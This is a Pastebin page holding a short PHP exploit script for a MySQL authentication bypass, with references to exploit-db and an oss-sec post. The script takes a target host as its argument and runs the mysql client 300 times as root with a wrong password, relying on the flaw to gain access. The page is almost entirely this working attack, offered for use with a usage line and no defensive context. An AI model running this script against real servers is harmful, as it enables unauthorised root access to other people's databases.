Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //http://www.exploit-db.com/exploits/19092/
- //http://seclists.org/oss-sec/2012/q2/493
- //USE: php scrip.php target.com
- for ($i = 0; $i <= 300; $i++) {
- echo "\r[ {$i} ] - Tentativa - " . system("mysql --host={$argv[1]} -u root mysql --password=blah");
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement